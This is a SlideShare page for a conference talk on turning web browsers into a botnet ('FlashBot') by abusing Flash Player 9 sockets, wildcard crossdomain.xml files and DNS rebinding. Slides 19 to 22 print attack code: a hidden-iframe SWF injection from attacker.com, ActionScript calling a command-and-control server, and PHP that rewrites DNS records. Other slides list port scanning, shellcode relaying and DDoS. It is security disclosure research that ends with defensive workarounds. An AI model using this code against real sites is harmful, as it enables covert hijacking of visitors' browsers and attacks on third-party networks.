Zombilizing The Web Browers  Via Flash Player 9 <ul><li>Thai N. Duong </li></ul><ul><li><thaidn AT gmail DOT com> </li></u...
Overview <ul><li>Flash Player 9 and its potential weaknesses </li></ul><ul><ul><li>Socket class </li></ul></ul><ul><ul><li...
Flash Player 9 Socket  class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionS...
Flash Player 9 Socket  class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionS...
Flash Player 9 Socket  class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionS...
Same-Origin Policy <ul><li>originally released with Netscape Navigator 2.0 and has been incorporated into every major brow...
Same-Origin Policy
Flash Player 9 Same-Origin Policy
Breaking the SOP: crossdomain.xml <ul><li>A SWF file from  a.com  may read from the server at  b.com  (using the Socket cl...
DNS Pinning Explained <ul><li>same-origin policy </li></ul><ul><li>origin =  domain name  + port + protocol </li></ul>
DNS Pinning Explained <ul><li>same-origin policy </li></ul><ul><li>origin =  domain name  + port + protocol </li></ul><ul>...
DNS Pinning <ul><li>same-origin policy </li></ul><ul><li>origin =  domain name  + port + protocol </li></ul><ul><li>DNS is...
Breaking the SOP: DNS Spoofing  <ul><li>The user loads a SWF file from  www.attacker.com  and performs a DNS lookup for th...
Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from  www.attacker.com and performs a DNS lookup for that...
Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from  www.attacker.com and performs a DNS lookup for that...
Breaking the SOP: DNS Spoofing  <ul><li>The user loads a SWF file from  www.attacker.com and performs a DNS lookup for tha...
Breaking the SOP: DNS Spoofing  <ul><li>The user loads a SWF file from  www.attacker.com and performs a DNS lookup for tha...
FlashBot 101 <ul><li>an 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player ...
How FlashBot works <ul><li>FlashBot is secretly inserted into www.example.com via JavaScript or iframe: </li></ul><ul><li>...
How FlashBot works <ul><li>Victim visits  www.example.com  to load FlashBot from http://<random-subdomain>.attacker.com/fl...
How FlashBot works <ul><li>C&C server sends to FlashBot a command which is associated with a target IP address </li></ul><...
How FlashBot works <ul><li>ActionScript in FlashBot waits for the DNS information expires: </li></ul><ul><li>timer1 = new ...
Show Time! - set your  DNS server  to 221.133.4.24 - start  Wireshark  to see what you send out!
Demo 1: port scanning <ul><li>works on Firefox </li></ul><ul><li>scan 127.0.0.1 </li></ul><ul><li>scan all other hosts in ...
Demo 2: socket relaying <ul><li>works on all browsers supporting Flash Player 9 </li></ul><ul><li>relay socket connection ...
Workarounds <ul><li>disable Flash Player (and all other plugins) in your web browser. </li></ul><ul><li>still want to watc...
Thanks <ul><li>DAB Security Team </li></ul><ul><li>VNSecurity Team, esp. rd and aquynh </li></ul><ul><li>http://christ1an....
Zombilizing The Web Browers  Via Flash Player 9 <ul><li>Thank you! </li></ul><ul><li>Questions/Comments? </li></ul>Thai N....
Upcoming SlideShare
Loading in …5
×

Zombilizing The Web Browser Via Flash Player 9

6,276 views
6,153 views

Published on

This paper talks about how hackers can exploit Flash Player 9's weaknesses to build a botnet to launch malicous attacks against the intranets and the Internet

Published in: Technology
1 Comment
2 Likes
Statistics
Notes
  • thanks for sharing ... This is a link to download the new version Adobe Flash Player http://en.moraa.com/software/download-adobe-flash-player/
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
6,276
On SlideShare
0
From Embeds
0
Number of Embeds
55
Actions
Shares
0
Downloads
210
Comments
1
Likes
2
Embeds 0
No embeds

No notes for slide

Zombilizing The Web Browser Via Flash Player 9

  1. 1. Zombilizing The Web Browers Via Flash Player 9 <ul><li>Thai N. Duong </li></ul><ul><li><thaidn AT gmail DOT com> </li></ul>http://vnhacker.blogspot.com
  2. 2. Overview <ul><li>Flash Player 9 and its potential weaknesses </li></ul><ul><ul><li>Socket class </li></ul></ul><ul><ul><li>Breaking the same-origin policy using crossdomain.xml and DNS Spoofing </li></ul></ul><ul><li>Exploiting the weaknesses </li></ul><ul><ul><li>Introducing FlashBot </li></ul></ul><ul><ul><li>Demo </li></ul></ul><ul><li>Workarounds </li></ul>
  3. 3. Flash Player 9 Socket class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” </li></ul>
  4. 4. Flash Player 9 Socket class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” </li></ul>Let's port nmap to ActionScript !
  5. 5. Flash Player 9 Socket class <ul><li>Quote from Flash 9 documentation </li></ul><ul><li>“ The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols.” </li></ul><ul><li>Let's port nmap to ActionScript ! </li></ul><ul><ul><li>Err wait, how about the </li></ul></ul><ul><ul><li>same-origin policy ? </li></ul></ul>
  6. 6. Same-Origin Policy <ul><li>originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since </li></ul><ul><li>prevents a document or script loaded from one site of origin from manipulating properties of or communicating with a document loaded from another site of origin </li></ul><ul><li>origin = domain name + port + protocol </li></ul>
  7. 7. Same-Origin Policy
  8. 8. Flash Player 9 Same-Origin Policy
  9. 9. Breaking the SOP: crossdomain.xml <ul><li>A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains). </li></ul><ul><li><?xml version=&quot;1.0&quot;?> </li></ul><ul><li><!DOCTYPE cross-domain-policy SYSTEM &quot;http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd&quot;> </li></ul><ul><li><cross-domain-policy> </li></ul><ul><li><allow-access-from domain=”*” to-ports=”*” /> </li></ul><ul><li></cross-domain-policy> </li></ul><ul><li>Yahoo! - http://api.search.yahoo.com/crossdomain.xml </li></ul><ul><li>YouTube - http://www.youtube.com/crossdomain.xml </li></ul><ul><li>Amazon.com - http://www.amazon.com/crossdomain.xml </li></ul>
  10. 10. DNS Pinning Explained <ul><li>same-origin policy </li></ul><ul><li>origin = domain name + port + protocol </li></ul>
  11. 11. DNS Pinning Explained <ul><li>same-origin policy </li></ul><ul><li>origin = domain name + port + protocol </li></ul><ul><li>DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Dynamic DNS anybody? </li></ul><ul><li>Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain </li></ul>
  12. 12. DNS Pinning <ul><li>same-origin policy </li></ul><ul><li>origin = domain name + port + protocol </li></ul><ul><li>DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. </li></ul><ul><li>Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain </li></ul><ul><li>fact: Flash Player does not pin DNS at all. </li></ul>
  13. 13. Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. </li></ul>
  14. 14. Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. </li></ul><ul><li>ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. </li></ul>
  15. 15. Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. </li></ul><ul><li>ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. </li></ul><ul><li>Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. </li></ul>
  16. 16. Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. </li></ul><ul><li>ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. </li></ul><ul><li>Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. </li></ul><ul><li>The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com. </li></ul>
  17. 17. Breaking the SOP: DNS Spoofing <ul><li>The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname receiving 222.222.222.222 with a TTL of one second. </li></ul><ul><li>ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL expired. </li></ul><ul><li>Since the DNS is not longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located. </li></ul><ul><li>The DNS server, controlled by attackers, responds with 111.111.111.111, which points to www.example.com </li></ul><ul><li>The SWF file located on www.attacker.com now has full access to www.example.com </li></ul>
  18. 18. FlashBot 101 <ul><li>an 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9 </li></ul><ul><li>once loaded on victim web browsers, FlashBot can leverage victim computers to execute commands received from a C&C server </li></ul><ul><li>commands that FlashBot understands: </li></ul><ul><ul><li>port scaning </li></ul></ul><ul><ul><li>socket relaying (i.e., to send shellcode) </li></ul></ul><ul><ul><li>launching web DDoS attacks </li></ul></ul>
  19. 19. How FlashBot works <ul><li>FlashBot is secretly inserted into www.example.com via JavaScript or iframe: </li></ul><ul><li>function source() { </li></ul><ul><li>return &quot;http://&quot; + Math.random().toString().substr(2) + &quot;.&quot; + &quot;attacker.com/ flashbot .swf&quot; ; </li></ul><ul><li>} </li></ul><ul><li>document.write('<object width=&quot;1&quot; height=&quot;1&quot;>'); </li></ul><ul><li>document.write('<embed src=&quot;' + source() + '&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;1&quot; height=&quot;1&quot;>'); </li></ul><ul><li>document.write('</embed></object>'); </li></ul>
  20. 20. How FlashBot works <ul><li>Victim visits www.example.com to load FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf </li></ul><ul><li>ActionScript in FlashBot connects back to the C&C server: </li></ul><ul><li>private function getCommand(subdomain:String, domain:String):void { </li></ul><ul><li>var cnc: String = &quot;http://cnc&quot; + &quot;.&quot; + domain; </li></ul><ul><li>var connection:NetConnection = new NetConnection(); </li></ul><ul><li>connection.connect(cnc + &quot;/flashservices/gateway.php&quot;); </li></ul><ul><li>connection.call(&quot;FlashBot.getCommand&quot;, responder, subdomain, domain); </li></ul><ul><li>} </li></ul>
  21. 21. How FlashBot works <ul><li>C&C server sends to FlashBot a command which is associated with a target IP address </li></ul><ul><li>C&C server automatically updates the DNS server (powered by PowerDNS) to map the subdomain of victim to the target IP address: </li></ul><ul><li>$query = &quot;SELECT 1 FROM records WHERE name = ' $record_name '&quot;; </li></ul><ul><li>$result = mysql_query($query); </li></ul><ul><li>if ( mysql_num_rows($result) ) { </li></ul><ul><li>$query = &quot;UPDATE records SET content=' $ip ' WHERE name='$record_name'&quot;; </li></ul><ul><li>} </li></ul><ul><li>else { </li></ul><ul><li> $query = &quot;INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', ' 6 ', NULL, NULL)&quot;; </li></ul><ul><li>} </li></ul>
  22. 22. How FlashBot works <ul><li>ActionScript in FlashBot waits for the DNS information expires: </li></ul><ul><li>timer1 = new Timer( 10 * 1000, 1 ); </li></ul><ul><li>timer1.addEventListener( TimerEvent.TIMER, exeCommand ); </li></ul><ul><li>timer1.start(); </li></ul><ul><li>FlashBot executes the command, and (optionally) sends the result back to C&C then to start over the whole process. </li></ul>
  23. 23. Show Time! - set your DNS server to 221.133.4.24 - start Wireshark to see what you send out!
  24. 24. Demo 1: port scanning <ul><li>works on Firefox </li></ul><ul><li>scan 127.0.0.1 </li></ul><ul><li>scan all other hosts in the same subnet with the victim </li></ul><ul><li>http://www.example.com/scanport.html </li></ul>
  25. 25. Demo 2: socket relaying <ul><li>works on all browsers supporting Flash Player 9 </li></ul><ul><li>relay socket connection to any IP address in the intranets and the Internet </li></ul><ul><li>can be used to send shellcodes, spam mails, launch DDoS attacks </li></ul><ul><li>http://www.example.com/relay.html </li></ul>
  26. 26. Workarounds <ul><li>disable Flash Player (and all other plugins) in your web browser. </li></ul><ul><li>still want to watch youtube.com? use Firefox + NoScript + FlashBlock </li></ul><ul><li>restrict browser access to only port 80 and 443 using a personal firewall </li></ul>
  27. 27. Thanks <ul><li>DAB Security Team </li></ul><ul><li>VNSecurity Team, esp. rd and aquynh </li></ul><ul><li>http://christ1an.blogspot.com </li></ul><ul><li>http://www.jumperz.net </li></ul><ul><li>theresacow: I own you a hug ;). </li></ul>
  28. 28. Zombilizing The Web Browers Via Flash Player 9 <ul><li>Thank you! </li></ul><ul><li>Questions/Comments? </li></ul>Thai N. Duong

×